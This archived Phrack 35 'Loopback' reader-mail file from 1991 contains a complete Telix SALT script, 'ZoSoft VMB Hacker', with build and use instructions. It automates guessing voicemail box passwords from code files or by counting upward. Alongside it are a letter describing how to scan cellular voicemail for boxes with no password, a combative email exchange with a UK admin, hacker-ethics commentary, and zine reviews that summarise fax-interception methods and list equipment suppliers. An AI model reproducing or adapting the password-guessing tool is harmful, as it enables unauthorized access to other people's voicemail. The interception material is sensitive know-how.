home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / phrack2 / phrack35.002 < prev    next >
Encoding:
Text File  |  2003-06-11  |  28.6 KB  |  725 lines

  1. ______________________________________________________________________________
  2.  
  3.  
  4.                                 ==Phrack Inc.==
  5.  
  6.                 Volume Three, Issue Thirty-five, File 2 of 13
  7.  
  8.                           [-=:< Phrack Loopback >:=-]
  9.  
  10.                                 By Phrack Staff
  11.  
  12.      Phrack Loopback is a forum for you, the reader, to ask questions, air
  13. problems, and talk about what ever topic you would like to discuss.  This is
  14. also the place The Phrack Staff will make suggestions to you by reviewing
  15. various items of note; magazines, software, catalogs, hardware, etc.
  16. ______________________________________________________________________________
  17.  
  18. What's on Your Mind
  19. ~~~~~~~~~~~~~~~~~~
  20.  
  21. :: Hacking VMB's ::
  22.  
  23. From: Mr. Upsetter
  24. To: phracksub@stormking.com
  25. Subject: Phrack 34 VMB article
  26.  
  27. The article in Phrack 34 on voice mail hacking by Night Ranger was really good.
  28. It reminded me of some experiences I had with a cellular voice mail system a
  29. couple years ago in San Diego.  I would bet there are similar systems in other
  30. cities.
  31.  
  32. These VMB's would automatically answer calls when the subscriber wasn't on the
  33. air.  They worked just like standard VMB's.  To access the box, the owner could
  34. dial his or her own cellular number, then hit * when it answered.  Then the VMB
  35. would ask for a password.
  36.  
  37. Guess what the default password was?  None!  That meant all you had to do was
  38. dial up a cellular VMB and hit *, and you were in.  How many VMB's still had
  39. the default password?  About half...
  40.  
  41. To scan for cellular VMB's all you had to do was dial numbers in the cellular
  42. prefix.  It was pretty fun...almost too easy.
  43.  
  44. Cheers,
  45. Mr. Upsetter
  46.  
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48.  
  49. >From: Zoso Puda
  50. >
  51. >After reading PHRACK 34 I thought it was good. Especially the article on VMB
  52. >hacking. As a matter of fact I wrote a SALT script to help me do it.
  53.  
  54.      This is exactly what we like to see.  People actually getting basic
  55. information and building on it.
  56.  
  57. -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -
  58.  
  59.                     +-------------------------------------+
  60.                     |      ZoSoft Telix VMB Hacker        |
  61.                     |                                     |
  62.                     |       written by: Zoso Puda         |
  63.                     +-------------------------------------+
  64. First words
  65. -----------
  66.    After reading Night Ranger's article (see PHRACK 34), I decided to make a
  67. VMB hacking program. Night Ranger provided good insight into how to hack VMB
  68. systems but some VMBs are hard to crack. What I came up with is a program to
  69. help me hack some of the harder systems. The ones that don't use the defaults
  70. are tough. Also my phone has the buttons and earpiece in one unit and I had to
  71. dial then put the phone to my ear and listen, look at the buttons to dial a
  72. number and put the phone back to my ear to listen. It soon became tiresome.
  73.  
  74.    What I finally came up with was a program to let me run all the phone
  75. functions from the keyboard. My modem speaker is loud enough to hear clearly so
  76. it seemed like the perfect thing to do. I also automated certain features like
  77. incrementing the password or box number. The program is not fully automated
  78. however. You must run this program manually. It's main purpose is to allow you
  79. to run normal phone functions via the keyboard. If you cannot hear clearly
  80. through your modem speaker then pick up the phone after the program dials the
  81. VMB phone # and hang up the phone before hanging up the modem.
  82.  
  83.    What follows is a brief description on how to use the program, compile the
  84. program, and run the program. A working knowledge of VMB systems is expected.
  85.  
  86. Parameter details
  87. -----------------
  88.   VMB phone number : If you don't know this, give it up.
  89.  
  90.   Setup sequence : This code is used for systems that require a '9' or '#' or
  91.                    '*' to be pressed before the box number. Up to 3 characters
  92.                    can be in this string.
  93.  
  94.   Valid Box #      : This would be a known valid box or the box you will
  95.                      be attempting to hack. This value remains constant.
  96.  
  97.   Codefile filename: You may use a file to get 'default' or your favorite
  98.                      passwords from. You must include the extension.
  99.  
  100.   Starting box/code: Box # or code to start checking. This value will
  101.                      increase automatically upon pressing [F7].
  102.  
  103. Using the function keys
  104. -----------------------
  105.                 [F1]    Dials the VMB system (see params).
  106.                 [F2]    Hangs-up the modem.
  107.                 [F3]    Closes the current codefile.(see params).
  108.                 [F4]    Lets you set the current code/box #.
  109.                 [F5]    Dials the Setup sequence (see params).
  110.                 [F6]    Dials the current code.
  111.                 [F7]    Makes the next code current.
  112.                 [F8]    Dials the valid box (see params).
  113.                 [F9]    Allows you to re-set the parameters.
  114.                 [F10]   Hangs-up and quits the program.
  115.                 [0 - 9] These keys will dial 0 - 9 respectively.
  116.                 [*, #]  These keys will dial * and #.
  117.                 [/]     Used as a substitute # for the keypad.
  118.  
  119. Basic Insructions
  120. -----------------
  121. Codefiles should be stored in the same directory as your Telix program.
  122.  
  123. A sample codefile should look like this:
  124.  
  125. 1111
  126. 2222
  127. 3333
  128. etc...
  129.  
  130. I suggest you make seperate codefiles for the number of digits in each code.
  131. For example, all 3 digit codes should be in a file called 3DIGIT.COD, or
  132. something similar.
  133.  
  134. During parameter entry, if you enter a codefile and it exists, you will NOT
  135. be prompted for a 'Starting box/code'. When the codefile is finished, the
  136. current code will set itself to 1000.
  137.  
  138. If you enter a blank for the codefile or the name you entered doesn't exist
  139. then you will be prompted for a 'Starting Box/Code'.
  140.  
  141. Compiling
  142. ---------
  143.  Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file
  144.  VMBHACK.SLT into the directory where your Telix scripts are. Compile using
  145.  CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press
  146.  Alt-G followed by the program name (VMBHACK).
  147.  
  148. //---------------------------<CUT HERE>-------------------------------------
  149. //                   ZoSoft VMB Hacker Version 1.4
  150. //                    Code by: Zoso, November 1991
  151. //
  152. //           See PHRACK 34 for more information on VMB systems.
  153. //
  154. // NOTE: Do not remove the credits of the original author, modified versions
  155. //       you may add credits, but please do not remove any.
  156. //
  157. str code[10],                           // Global Variables
  158.     codes[10],
  159.     reset[1],
  160.     vmb_number[15],
  161.     borc[1],
  162.     valid[10],
  163.     setup[3];
  164. str filename[12],
  165.     fstatus[10];
  166. int f;
  167. int fflag = 0;
  168. init_modem()                            // Modem initialization
  169. {
  170. cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on
  171. cputs("^M");                            // some modems, you may have to
  172. waitfor("OK",20);                       // alter this. See you modem
  173. manual.
  174. }
  175. vmb_dial(str string)                    // Dial function
  176. {
  177. str workstr[20];
  178. workstr = string;
  179. strcat(workstr,";");
  180. cputs("ATDT");
  181. cputs(workstr);
  182. cputs("^M");
  183. cputs("^M");
  184. }
  185. hang_up()                               // Hang Up function
  186. {
  187. hangup();
  188. waitfor("",20);
  189. cputs("ATH0");
  190. cputs("^M");
  191. cputs("^M");
  192. clear_scr();
  193. display();
  194. }
  195. next_code()                             // Next code function
  196. {
  197. int cd;
  198. if (fflag)
  199.    {
  200.     if (not feof(f))                    // Check for file first
  201.        {
  202.         fgets(code,10,f);
  203.         return;
  204.        }
  205.     if (feof(f))
  206.        {
  207.         file_close();
  208.         code = "999";
  209.         goto NEXTCODE;
  210.        }
  211.    }
  212. NEXTCODE:
  213. cd = stoi(code);
  214. cd = cd + 1;                            // This line determines how the
  215. code
  216. itos(cd,code);                          // gets incremented.
  217. }
  218. set_code()                              // Enter new code
  219. {
  220. gotoxy(65,2);
  221. gets(code,10);
  222. }
  223. parameters()                            // Set parameters
  224. {
  225. str c[1];
  226. file_close();
  227. GETINFO:
  228. clear_scr();
  229. printsc("VMB Hacker Parameters^M^J");
  230. printsc("^M^JVMB phone number    :");
  231. gets(vmb_number,15);
  232. printsc("^M^JSetup sequence      :");
  233. gets(setup,3);
  234. printsc("^M^JValid box #         :");
  235. gets(valid,10);
  236. printsc("^M^JCodefile filename   :");
  237. gets(filename,12);
  238. if (filename != "")
  239.    {
  240.     open_file();
  241.     next_code();
  242.    }
  243. if (not fflag)
  244.    {
  245.     filename = "N/A";
  246.     printsc("^M^JStarting box/code   :");
  247.     gets(code,10);
  248.    }
  249. printsc("^M^J^M^JCorrect? (Y/n):");
  250. gets(c,1);
  251. if (c == "n" || c == "N")
  252.     goto GETINFO;
  253. }
  254. press_enter()                           // Pause routine
  255. {
  256. str a[1];
  257. pstraxy("Press [ENTER] to continue...",20,23,11);
  258. gets(a,1);
  259. }
  260. title_scr()                             // Title screen
  261. {
  262. str i[1];
  263. TITLE:
  264. clear_scr();
  265. pstraxy("  - ZoSoft VMB Hacker V1.4 -",20,4,11);
  266. pstraxy("written for Telix by: Zoso Puda",20,6,14);
  267. press_enter();
  268. }
  269. display()                               // Display screen
  270. {
  271. box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19);
  272. pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31);
  273. pstraxy("VMB Number:",4,2,31);          // Information display
  274. pstraxy(vmb_number,16,2,27);
  275. pstraxy("Valid #:",33,2,31);
  276. pstraxy(valid,42,2,27);
  277. pstraxy("Current:",57,2,31);
  278. pstraxy(code,66,2,27);
  279. pstraxy("Codefile:",6,4,31);
  280. pstraxy(filename,16,4,27);
  281. pstraxy("File status:",29,4,31);
  282. pstraxy(fstatus,42,4,27);
  283. pstraxy("Setup sequence:",50,4,31);
  284. pstraxy(setup,66,4,27);
  285. box(0,6,78,10,4,0,103);                 // Function key display
  286. pstraxy("[           ]",30,6,111);
  287. pstraxy(" 0 - 9,*,#",31,6,110);
  288. pstraxy("[  ] Dial VMB", 2,7,111);
  289. pstraxy("F1", 3,7,110);
  290. pstraxy("[  ] Hang up",22,7,111);
  291. pstraxy("F2",23,7,110);
  292. pstraxy("[  ] Close file",42,7,111);
  293. pstraxy("F3",43,7,110);
  294. pstraxy("[  ] Set Current",61,7,111);
  295. pstraxy("F4",62,7,110);
  296. pstraxy("[  ] Setup seq.",2,8,111);
  297. pstraxy("F5", 3,8,110);
  298. pstraxy("[  ] Dial current",22,8,111);
  299. pstraxy("F6",23,8,110);
  300. pstraxy("[  ] Next box/code",42,8,111);
  301. pstraxy("F7",43,8,110);
  302. pstraxy("[  ] Valid box",61,8,111);
  303. pstraxy("F8",62,8,110);
  304. pstraxy("[  ] Parameters",22,9,111);
  305. pstraxy("F9",23,9,110);
  306. pstraxy("[   ] QUIT",41,9,111);
  307. pstraxy("F10",42,9,110);
  308. gotoxy(0,11);
  309. }
  310. quit_vmb()                              // End program
  311. {
  312. file_close();
  313. hangup();
  314. waitfor("",20);
  315. clear_scr();
  316. printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J");
  317. cputs_tr(_mdm_init_str);                // Restore modem params
  318. }
  319. open_file()                             // Open Codefile
  320. {
  321. fflag = 1;
  322. f = fopen(filename,"r");
  323. fstatus = "OPEN";
  324. if (ferror(f))
  325.     file_close();
  326. }
  327. file_close()                            // Close Codefile
  328. {
  329. fflag = 0;
  330. fclose(f);
  331. fstatus = "CLOSED";
  332. }
  333. main()                                  // MAIN program module
  334. {
  335. int chr;
  336. title_scr();
  337. parameters();
  338. clear_scr();
  339. display();
  340. init_modem();
  341. TOP:
  342. gotoxy(0,11);
  343. chr = inkeyw();
  344. if (chr == '0')    vmb_dial("0");       // Dial 0-9
  345. if (chr == '1')    vmb_dial("1");
  346. if (chr == '2')    vmb_dial("2");
  347. if (chr == '3')    vmb_dial("3");
  348. if (chr == '4')    vmb_dial("4");
  349. if (chr == '5')    vmb_dial("5");
  350. if (chr == '6')    vmb_dial("6");
  351. if (chr == '7')    vmb_dial("7");
  352. if (chr == '8')    vmb_dial("8");
  353. if (chr == '9')    vmb_dial("9");
  354. if (chr == '#')    vmb_dial("#");       // Pound sign (#)
  355. if (chr == '/')    vmb_dial("#");       // Make (/) same as (#) for keypad
  356. if (chr == '*')    vmb_dial("*");       // Asterisk (*)
  357. if (chr == 15104)                       // F1
  358.     vmb_dial(vmb_number);
  359. if (chr == 15360)                       // F2
  360.     hang_up();
  361. if (chr == 15616)                       // F3
  362.    {
  363.     file_close();
  364.     display();
  365.    }
  366. if (chr == 15872)                       // F4
  367.    {
  368.     set_code();
  369.     display();
  370.    }
  371. if (chr == 16128)                       // F5
  372.     vmb_dial(setup);
  373. if (chr == 16384)                       // F6
  374.     vmb_dial(code);
  375. if (chr == 16640)                       // F7
  376.    {
  377.     next_code();
  378.     display();
  379.    }
  380. if (chr == 16896)                       // F8
  381.     vmb_dial(valid);
  382. if (chr == 17152)                       // F9
  383.    {
  384.     hang_up();
  385.     parameters();
  386.     display();
  387.    }
  388. if (chr == 17408)                       // F10
  389.    {
  390.     quit_vmb();
  391.     goto END;
  392.    }
  393. goto TOP;
  394. END:
  395. prints("^M^J");
  396. }
  397. //---------------------------<CUT HERE>---------------------
  398.  
  399. ______________________________________________________________________________
  400.  
  401. :: More Legal Stuff ::
  402.  
  403. >From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
  404. >Subject: RE: Who/What is this?
  405. >
  406. >In this country, the receipt of documents like this would probably be
  407. >pretty helpful in sending a person down on a conspiracy to contravene
  408. >a section or more of the Computer Misuse Act, I do not appreciate crap
  409. >like this appearing on my machine but since you didn't send it me, I
  410. >can't really moan at you - What I would appreciate though is if you
  411. >told people that forwarding it to people who don't want it is probably
  412. >not a good idea, unless you want all your list members locked up in
  413. >some pokey British gaol that is!
  414. >
  415. >Michael Lawrie.
  416. >---
  417. >Michael Lawrie, Hicom Group Security           <security@uk.ac.lut.hicom>
  418.  
  419. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  420.  
  421. Sir,
  422.      You will have to excuse my ignorance of telecom laws in other countries.
  423. In the United States, distribution of technical information such as Phrack Inc.
  424. is protected by law.
  425.  
  426.      Hackers are not involved in conspiracies or plots.  Most hackers could
  427. care less about politics.  Hackers are interested in the progression of
  428. technology and learning about how our advanced society works.  The inefficient
  429. structure known as government is the last thing most hackers are interested in
  430. exploring.
  431.  
  432.      Phrack Inc. has no "membership."  Phrack Inc. is an electronically
  433. distributed publication.  It is like any other security oriented newsletter.
  434. Have you ever heard of "Computer Security Journal", "Computers and Security",
  435. or "Computer Crime Digest?"  These are some of the "security industry"
  436. publications that are read in the U.S.  Phrack Inc. merely has a little
  437. different flavor to it.  If you are interested in seeing any of these printed
  438. journals, I can forward their address to you.
  439.  
  440.      I am sorry if you received Phrack Inc. and didn't wish to read it.  You
  441. might wish to take the matter up with the person that forwarded it to you.  I
  442. hope it wasn't too big of an inconvenience for you to delete the mail message
  443. containing Phrack Inc.
  444.  
  445. Cheers,
  446.  
  447. Dispater
  448.  
  449. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  450.  
  451.      After a (as it turns out not so private) conversation with Torq, it seems
  452. this guy isn't even an admin anywhere.  He just likes to pretend he is.  Did my
  453. reply end this little debate?  NOT!  This person had the nerve to intercept my
  454. private mail to Torq and then proceeded to bitch about it some more.
  455.  
  456. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  457.  
  458. >From MICHAEL@hicom.loughborough.ac.uk Sat Nov  9 09:45:53 1991
  459. Date: Fri, 8 Nov 91 13:19 GMT
  460. From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
  461. To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>>
  462. Subject: The EFF.
  463.  
  464. I found the following message the other day, whilst routing around, I am to
  465. assume you lied to me about taking him off the list but for now we'll forget
  466. that.
  467.  
  468. > From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991
  469. > Date: Wed, 23 Oct 91 01:41:47 -0400
  470. > From: phracksub@stormking.com
  471. > Message-Id: <::::::::::::::::::::::>       
  472. > To: torq@:::::::::::::::
  473. > Subject: Phrack
  474. >
  475. > This guy sounds like a total idiot. If he does kill your account or something
  476. > stupid, get a hold of the EFF.  They went to bat for someone who had their
  477. > account revoked because he/she had issues of Phrack on their directory.
  478. >
  479. > people should get a clue....
  480. >
  481. > Dispater
  482. > phracksub@stormking.com
  483.  
  484. As you say, people should get a clue. Are you assuming that 'torq' is perhaps
  485. American and as such has his rights protected by constitution? He isn't, he is
  486. British and doesn't really as such have much going for him. If I want to kill
  487. his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack'
  488. is not breaking any laws because it does not show intent, it would be breaking
  489. my machine's regulations if it came here. I would enjoy the EFF to come 'to
  490. bat' for Torq if I revoke his account for having issues of Phrack in his
  491. directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK
  492. that you know of?
  493.  
  494. Regards...
  495.   Michael.
  496.  
  497. ---
  498. Michael Lawrie, Operations Group, Systems Development and Security.
  499. Mail: michael@uk.ac.lut.hicom                     (Span:19527::60478::lorry)
  500. [What pretentious signature?]                     (Inet: lorry@mit.edu)
  501.  
  502.  
  503. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  504.  
  505. From: Dispater
  506. To: MICHAEL@hicom.loughborough.ac.uk
  507.  
  508.         I never said I would delete him from the distribution list.  I don't
  509. have to DO anything.  Who the hell are you pretending to be anyway?  You aren't
  510. the admin of MIT's gnu machine.
  511.  
  512. >I found the following message the other day, whilst routing around, I am to
  513. >assume you lied to me about taking him off the list but for now we'll forget
  514. >that.
  515.  
  516.         Really?  What the hell were you doing prowling though someone else's
  517. mail?  I assume you did it without Torq's permission.  I wonder if MIT would
  518. like to hear that some British hacker is rummaging around their machine?  Your
  519. "finding" of our private e-mail might place you in criminal violation of the
  520. Electronic Communications Privacy Act of 1986.  This is a federal law in the
  521. United States which protects the privacy of electronic communications.  Your
  522. interception of our communications has violated our privacy.  How would you
  523. like me to have a little chat with YOUR supervisor?
  524.  
  525.        Why you care about what takes place on the MIT computer which is located
  526. here in the USA?  In this country freedom of speech is a right granted to all
  527. its citizens.  The previous publisher of Phrack had to go to Federal Court to
  528. prove it and he succeeded.  Phrack Inc. is 100% legal here and there is not one
  529. damn thing you can do about it!
  530.  
  531. Dispater
  532. ______________________________________________________________________________
  533.  
  534. :: Hacker Philosophy ::
  535.  
  536. From: The Dark Lord Sarik Malthus
  537. Organization: Underground Computing Foundation
  538.  
  539.  
  540. >         I'm curious...now, don't think I am trying to judge you, or your
  541. > actions, or anything...but I am wondering how you, in your mind, justify the
  542. > actions of hackers and the kind of information provided by your magazine?
  543.  
  544.      I don't.  I think people spend too much time attempting to justify
  545. their "morality."  I don't play that guilt trip.  I only seek information.
  546. Information has no morality.  It is simple and pure, just like truth.
  547.  
  548.      I do feel that with knowledge comes responsibility not to use it in a
  549. destructive way.  This is why I will not print "how to make bomb" files in
  550. Phrack Inc.  Explosives are made for one thing and it doesn't involve too
  551. much creativity.  People can get that type of stuff elsewhere.
  552.  
  553.      I have never damaged any system or hurt any individual financially.
  554. Carding is unquestionable robbery.  If you know the person you are carding
  555. from, that is revenge and is a different category, as far as I am concerned,
  556. but it still doesn't make it right.  Besides, any poser with half a brain can
  557. pull a CBI.  That doesn't demonstrate much talent to me.  I admit I went
  558. through the c0deZ phase, but I moved onto better things.
  559.  
  560.      I guess your basic question may boil down to, "Why hack?"  I see the
  561. internet and the telecom world in as the latest frontier to be explored.  If
  562. you look back at how this country started, you will see that it was explored
  563. by people who probably had a similar mentality to that of hackers.  We want
  564. to test ourselves.  We want to have a broad range of different experiences in
  565. our lives.  We are not content with ignorance of the unknown.  And, to some
  566. extent we are sick of our current society's norms.  With that in mind we
  567. leave the security of what is considered acceptable at times.
  568.  
  569.      I guess I have a lot of different unpopular views....oh well.
  570. _______________________________________________________________________________
  571.  
  572. A Review of:
  573. ~~~~~~~~~~
  574. Full Disclosure #23 - a publication For Truth, Justice, and The American Way
  575. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  576. Full Disclosure                              Subscription Rates:
  577. P.O. Box 903-FD23                            U.S - 12 issues for $18.00
  578. Libertyville  IL  60048                            24 issues for $29.95
  579.                                              No Canadian orders, please!
  580. by:Twisted Pair
  581.  
  582.  
  583.      About a month ago I mailed in a coupon I got from friend in order to get a
  584. sample issue of Full Disclosure.  Within a week I received Issue #23.  It's got
  585. articles on fax interception, dumpster diving, computer security tips,
  586. surveillance tips, technical stuff, mail surveillance, etc.
  587.  
  588.      The Fax Interception article was most interesting to me.  I've often
  589. wondered just how easy it could be to intercept faxes.  Its all explained in
  590. the article.  Here's some text from the article:
  591.  
  592. |                       False Sense of Security:
  593. |
  594. |   With the widespread proliferation of fax machines came increased use.
  595. |   In general, a document transferred has been given the same sort of
  596. |   validity as one sent or received by the U.S. Mail.*  In general, such
  597. |   communications were originally secure.  Now that interception equipment is
  598. |   available, the
  599. |   sense of security has become false.
  600.  
  601. *Note:  Just this month, the FCC has stopped accepting paperwork with faxed
  602.         signatures on them.  Their new policy states that they only accept
  603.         original signatures.
  604.  
  605.      How could the average Phrack reader start intercepting faxes?  Use a
  606. standard fax machine hooked up to someone's line?  Naaah.  Wouldn't work.  The
  607. handshaking routine between the two corresponding fax machines would be screwed
  608. all to hell if you threw a third machine into the mix.  Full Disclosure claims
  609. to have successfully nabbed faxes with another method.  They've pointed out
  610. this assertion with a photo on their front page of a "fax".  It was supposedly
  611. intercepted from the FBI.  It shows a computer screen with an FBI "FAX" on it.
  612. It looks more like the photo was made with some cutting and pasting at the
  613. neighborhood PIP store.  Maybe they should have added the caption "Simulated
  614. Picture" to their front page.
  615.  
  616.      They recommend using IBM PC fax boards to intercept faxes.  You'd need
  617. "sophisticated" software that would ignore the handshaking sequences between
  618. the two fax machines you're spying on.  The IBM would just save all the page
  619. information and ignore the protocol information transmitted.
  620.  
  621. Back to the article....
  622.  
  623. |   Cellular phone-based fax machines provide ripe opportunity for "hacker"
  624. |   intercepts, since the signal is available via low cost police scanners.*
  625. |   No physical connection to a common carrier network is necessary.  There is
  626. |   absolutely no risk of being detected.
  627.  
  628. *Note:  That should read MODIFIED police scanners.  See any of the ads in
  629.         "Nuts & Volts" for a book on doing this.
  630.  
  631.      Discussed in the article is something called Broadband Interception.
  632. Commercial fax interception equipment can be hooked up to monitor satellite
  633. link traffic.  One unit can decode up to 150 simultaneous fax transmissions
  634. from a 6,000 phone line satellite link.
  635.  
  636.      Next, all the consequences of forged faxes are discussed.  People have
  637. become so reliant on fax technology that they incorrectly assume that anything
  638. that "comes over the fax" must be legitimate.  Forgers find faxing much simpler
  639. than trying to make a "real" document.  The trouble of altering postmarks and
  640. signatures is bypassed.  All they need now is scissors and tape to make any
  641. "legitimate-looking" document needed.  In their next issue, they further
  642. discuss fax interception and all the implications of sending sensitive info by
  643. fax.
  644.  
  645. |                         Fax Intercept Suppliers
  646. |          (The sale and/or use of fax interception equipment may be
  647. |                  restricted by State and Federal law)
  648. |
  649. |   Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444;
  650. |   Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316;
  651. |   El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673;
  652. |   [Many others listed]
  653.  
  654. Oh, here's an ad from Full Disclosure.  It's a business card run:
  655.      ______________________________________________________
  656. |   |                                                      |
  657. |   | Unix Systems Specialists     Available July 10, 1992 |
  658. |   |                                                      |
  659. |   |               L  E  N       R  O  S  E               |
  660. |   |                                                      |
  661. |   |                  Convicted "Hacker"                  |
  662. |   |                         and                          |
  663. |   |                 Computer  Consultant                 |
  664. |   |              799 Royal St. Geore  #105               |
  665. |   |         Naperville, IL 60563  (708) 527-1293         |
  666. |   |______________________________________________________|
  667.  
  668.      Since you might want to check out a copy of Full Disclosure for yourself,
  669. I'll include their address and stuff.  The issue I had was 16 pages long,
  670. half-newspaper size.
  671. ______________________________________________________________________________
  672.  
  673.  
  674. A Review of TAP #105
  675. ~~~~~~~~~~~~~~~~~~~
  676. TAP Magazine                                       Subscription Rates:
  677. PO Box 20264                                       10 issues for $10.00
  678. Louisville KY  40250-0264
  679.  
  680. by Dispater
  681.  
  682.      Around March of 1991 I mailed in my $10. for a subscription to TAP
  683. Magazine.  Promoted as "the oldest hacker magazine" and "created by Abbie
  684. Hoffman."  I still, to this day, have not received ONE issue for my money.
  685.  
  686.      While attending CyberView '91, I met Predat0r and gave him $5.00 for a few
  687. back issues consisting of #97, #100 through issue #104.  I was later given a
  688. complimentary issue of #105.  After asking about #98 & #99, Predat0r said that
  689. he wasn't going to give those out because of some bullshit with Aristotle.
  690. Whatever...I still don't see why we couldn't see it.
  691.  
  692.      Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular,
  693. but it wasn't bad either.  The issue was 18 pages long.  For those of you who
  694. have never seen it, TAP contains information on hacking and phreaking as well
  695. as some political commentary.  The articles are always diverse and interesting.
  696.  
  697.      TAP #105 contained information about the DNA Box.  This is basically
  698. cellular phone phreaking.  It was very good and quite detailed.  There were
  699. also schematics of bugs and a flow chart explaining the incident initiation
  700. sequence of the E-911 system.  This issue of TAP was sprinkled with some neat
  701. advertisements and news clippings (as usual) and wrapped up with a file about
  702. Blue Boxing.  The price of $10.00 for 10 issues is worth it, but read on...
  703.  
  704.      Last week I asked Predat0r what was going on with TAP magazine.  He told
  705. me that he had the material for the next three issues, but his copier or some
  706. other equipment was broken.  This is an excuse I have heard before.  Whether it
  707. is a valid excuse or not, only he knows.  Since issue #105 (June) there has
  708. been not one issue of TAP.  If you have ordered a subscription prior to July
  709. and not received anything, I highly suggest you write to Predat0r.
  710.  
  711.      The material contained in TAP is good and very much worth the price.
  712. (Especially compared to 2600 Magazine) However, I find that the general
  713. management of TAP to be poor, at this time, and therefore I highly recommend
  714. that you NOT send your $10 to TAP Magazine.  Considering the amount of
  715. advertisements that we have all seen by TAP (in magazines such as Mondo 2000,
  716. 2600, etc.) in the past year, there is no excuse for the non-existent service
  717. that has transpired.  Predat0r is a good sysop and needs to manage TAP as he
  718. does his BBS.  I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP:
  719. COLUMBIAN COKE.
  720.  
  721.      I really don't like to be so critical, but I know some people I've talked
  722. to are feeling ripped off.  This is why I wrote this.  I truly hope that TAP
  723. can get out of this slump.
  724. _______________________________________________________________________________
  725.